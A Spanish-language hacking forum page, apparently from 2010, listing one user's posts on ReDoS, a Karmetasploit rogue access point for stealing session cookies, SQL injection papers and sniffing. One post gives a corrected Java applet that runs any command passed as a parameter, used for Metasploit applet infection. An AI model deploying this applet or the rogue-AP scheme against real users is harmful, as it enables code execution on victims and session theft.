Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - tragantras

#321
un redos segun tengo entendido es algo así como que el tiempo de cómputo para determinar si la expresion es "valida" excede unos límites razonables, dándose por váilida la cadena entera, permitiendose así la inyección de caracteres especiales



segun entendí cuando lo pusieron por aqui... xD
#322
Hacking / Re: [Metasploit] Karmetasploit
2 Febrero 2010, 16:50 PM
Cita de: Snek35 en  1 Febrero 2010, 18:29 PM
pero si tienes un router AP conectado por lan al pc, solo habria que ejecutar el karma.rc no?


vamos a ver el esquema es el siguiente


INTERNET ---> tu_router ---> tu_pc ~ AP VIRTUAL  <------ pc_victima


con tu pc creas una conexión AD-HOC al otro pc, que a través de ti reciviría ( o no, segun se configure ) acceso a internet. Está claro que si no tiene acceso a internet, de poco o NADA va a servir esto... pues la gracia es robar cookies sesiones en general y demás info.
#323
Hacking / Re: [Metasploit] Java Applet Infection
2 Febrero 2010, 11:31 AM
Vale reescribo xD:

El codigo java que has puesto está mal en varias cosas.. ( ya que copias, copia bien campeón xDD )

para empezar, no es "Try" sino try, tampoco "Catch" sino "catch", es decir, esas dos palabras en minúsculas. Por otra parte:
f = Runtime.getRuntime().exec("first");

está mal, es:

f = Runtime.getRuntime().exec(first);

es decir, sin las comillas, lo demás perfecto, un saludo! xD

pongo aquí el codigo entero bien... ( de todas maners en los otros posts si están bien escritos )


import java.applet.*;
import java.awt.*;
import java.io.*;
public class MSFcmd extends Applet {
public void init() {
Process f;
String first = getParameter(first);
try {
f = Runtime.getRuntime().exec(first);
}
catch(IOException e) {
e.printStackTrace();
}
Process s;
}
}






#324
no creo que los chicos del tuenti sean tan descuidados como para dejar recaer la seguridad de una gran comunidad sobre un captcha, supongo que a los X intentos ( includos con captcha ) banearán IPs o algo similar...
#325
Hacking / Re: [Metasploit] Java Applet Infection
1 Febrero 2010, 15:50 PM
muy buen post Shell Root. Por qué no te anímas y haces una recolección de todos tus posts abiertos? Estaría muy interesante a la larga contar con todos ellos reunidos ^^

Un saludo!
#326
Nivel Web / Re: vulnerabilidad en hi5 beta
1 Febrero 2010, 15:19 PM
Cita de: ▬▬▬▬► braulio23 ◄▬▬▬▬▬ en 31 Enero 2010, 11:02 AM
SDC trabajaba en hi5 así que me da la ligera impresión de que no vas a encontrar nada.


estás seguro de eso? pq hace un par de años encontró una vuln ahi y dio alguna charla sobre worms en redes sociales...pero trabajar ahi? :/ a ver si se pasa por aki y nos saca de la duda xD
#327
Nivel Web / Re: Inyeccion SQl Server.
30 Enero 2010, 13:29 PM
ups, ya los pegué, weno iwalmente los dejo ahi por si a alguien le sirve, my apologizes! xDD


por cierto, te cito lo que pone en la introducción del primero de ellos


CitarThis document discusses in detail the common 'SQL injection' technique, as it applies to
the popular Microsoft Internet Information Server/Active Server Pages/SQL Server
platform.

estás seguro de que no sirven? :/

un saludo
#328
Nivel Web / Re: Inyeccion SQl Server.
30 Enero 2010, 13:26 PM
Aquí tienes el par de papers de advanced sqli, están en ingles... asi que... xD eso:


www.ngssoftware.com/papers/advanced_sql_injection.pdf         [1 parte]
www.wisec.it/docs.php?id=1                                                    [2 parte]
#329
Hacking / Re: Problema DNSNIFF
27 Enero 2010, 23:57 PM
respecto a lo primero, prueba con algun sniffer tipo wireshark y observa si estás realmente "en medio"
#330
Cita de: Anon en 24 Enero 2010, 23:28 PM




No, this well here, apparently is the same flaw affecting the vBulletin.

It is common that when you see a fault in a CMS also appear in other CMS

Regards



No, it is well placed here, apparently is the same flaw that affects the vBulletin.
It is common that a flaw seen into a CMS also appears in other CMS.

regards




espero no molestar por tomarme la libertad de corregirte, un saludo